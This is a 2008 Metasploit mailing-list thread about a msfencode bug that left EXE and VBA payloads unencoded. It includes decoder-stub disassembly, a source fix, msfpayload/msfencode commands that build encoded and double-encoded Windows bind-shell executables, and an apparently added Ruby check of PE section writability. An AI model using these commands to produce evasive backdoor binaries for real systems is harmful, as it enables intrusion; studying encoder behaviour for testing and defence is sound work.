Metasploit mailing list archives
MSFEncode bug doesn't encode EXE's or VBA's
From: natron at invisibledenizen.org (natron)
Date: Fri, 19 Dec 2008 14:32:49 -0600
I can verify seeing a similar (same?) XOR error whenever I use the AlphanumMixed or AlphanumUpper encoders. I thought I was doing something wrong... but perhaps it's a bug in the encoder. I get the AV on:

XOR BYTE PTR DS:[ECX+33],AL

while ECX is FFFFFFFD... which causes an AV when it tries to write that XOR to 0x00000030.

So reverting the template fixes that, eh? That's fantastic, thanks for letting the list know your workaround!

The windows/tcp_bind payload is encoding to this:

54        PUSH ESP                          ; shellcode begins here
5B        POP EBX
DAD0      FCMOVBE ST,ST
D973 F0   FSTENV (28-BYTE) PTR DS:[EBX-10]
5E        POP ESI
5E        POP ESI
56        PUSH ESI
59        POP ECX
49        DEC ECX
49        DEC ECX
49        DEC ECX
43        INC EBX
43        INC EBX
43        INC EBX
43        INC EBX
43        INC EBX
43        INC EBX
43        INC EBX
51        PUSH ECX
5A        POP EDX
56        PUSH ESI
54        PUSH ESP
58        POP EAX
3330      XOR ESI,DWORD PTR DS:[EAX]
56        PUSH ESI
58        POP EAX
34 41     XOR AL,41
50        PUSH EAX
3041 33   XOR BYTE PTR DS:[ECX+33],AL

N

On Fri, Dec 19, 2008 at 2:03 PM, Mark Baggett <huperdefigo at gmail.com> wrote:
It seems there is an error in msfencode. Today it doesn't encode the payload when an output type of EXE or VBA is selected. Looking at the code, the problem for payloads of type exe and vba is this:

First the variable raw is assigned the encoded payload returned by the encode function.

Line 159

# Encode it up
raw = enc.encode(buf, badchars)

Then when it creates its exe it uses buf (the unencoded payload) again rather than raw (the encoded payload).

Line 173

exe = Rex::Text.to_win32pe(buf, "")

I changed it to raw...

exe = Rex::Text.to_win32pe(raw, "")

and it will then encode payloads of type exe. But the encoded payloads do not work. Using ollydbg I can see a memory access violation when the actual xor encoding attempts to write to the code segment where the payload runs. I reverted to the template.exe distributed prior to the Sept 29th update (Change set 5689) and everything works fine now.

The same error is in the code for encoding vba output.

After those three changes I am able to make encoded payloads...

./msfpayload windows/shell_bind_tcp R | ./msfencode -t exe -o ~/winbindencoded.exe

and double encoded payloads...

./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o ~/winbinddoubleencode.exe

Mark Baggett
http://markremark.blogspot.com

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
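Both messages above describe the same symptom: the decoder stub (the XOR BYTE PTR DS:[ECX+33],AL instruction) patches its own bytes in place, so it only runs if the section of the template the payload lands in is mapped writable. The thread does not say what changed in the template at changeset 5689, so the writable-section theory is an assumption to verify, not a fact from the thread. The following Ruby is an added diagnostic, not Metasploit code: it parses a PE's section table, finds the section containing AddressOfEntryPoint, and reports whether IMAGE_SCN_MEM_WRITE is set. The PE it builds is a constructed, headers-only sample, not template.exe.

```ruby
# Section characteristic flags from the PE/COFF spec.
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

# Walk the section table and return the header of the section that covers
# AddressOfEntryPoint, or nil if none does.
def entry_section(pe)
  raise 'missing MZ signature' unless pe[0, 2] == 'MZ'
  e_lfanew = pe[0x3c, 4].unpack1('V')
  raise 'missing PE signature' unless pe[e_lfanew, 4] == "PE\0\0"
  nsect    = pe[e_lfanew + 6, 2].unpack1('v')    # NumberOfSections
  opt_size = pe[e_lfanew + 20, 2].unpack1('v')   # SizeOfOptionalHeader
  entry    = pe[e_lfanew + 24 + 16, 4].unpack1('V') # AddressOfEntryPoint (RVA)
  table    = e_lfanew + 24 + opt_size            # first IMAGE_SECTION_HEADER
  nsect.times do |i|
    off = table + i * 40
    name = pe[off, 8].delete("\0")
    vsize, vaddr = pe[off + 8, 8].unpack('V2')
    chars = pe[off + 36, 4].unpack1('V')
    if entry >= vaddr && entry < vaddr + vsize
      return { name: name, vaddr: vaddr, vsize: vsize, chars: chars }
    end
  end
  nil
end

# True when a self-modifying decoder placed at the entry point could write to
# itself; false means the XOR stub would fault exactly as the thread describes.
def entry_section_writable?(pe)
  s = entry_section(pe)
  !s.nil? && (s[:chars] & IMAGE_SCN_MEM_WRITE) != 0
end

# Constructed minimal PE32 (DOS stub, COFF header, optional header, one
# section at RVA 0x1000 holding the entry point). Headers only, not loadable.
def build_min_pe(section_chars)
  dos  = 'MZ' + "\0" * 58 + [0x40].pack('V')                 # e_lfanew = 0x40
  coff = "PE\0\0" + [0x14c, 1, 0, 0, 0, 0xe0, 0x0102].pack('vvVVVvv')
  opt  = [0x10b].pack('v') + "\0" * 14 + [0x1000].pack('V') + "\0" * (0xe0 - 20)
  sect = '.text'.ljust(8, "\0") +
         [0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0, section_chars].pack('VVVVVVvvV')
  dos + coff + opt + sect
end

if __FILE__ == $0
  pe = ARGV[0] ? File.binread(ARGV[0]) : build_min_pe(IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
  s = entry_section(pe)
  puts "entry in #{s ? s[:name] : '(no section)'}: writable=#{entry_section_writable?(pe)}"
end
```

Run it with the path to a template.exe to compare the old and new templates; a false result for the entry section means an in-place XOR decoder cannot run without a page-protection change.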
Current thread:
- MSFEncode bug doesn't encode EXE's or VBA's Mark Baggett (Dec 19)
- MSFEncode bug doesn't encode EXE's or VBA's natron (Dec 19)
- MSFEncode bug doesn't encode EXE's or VBA's H D Moore (Dec 24)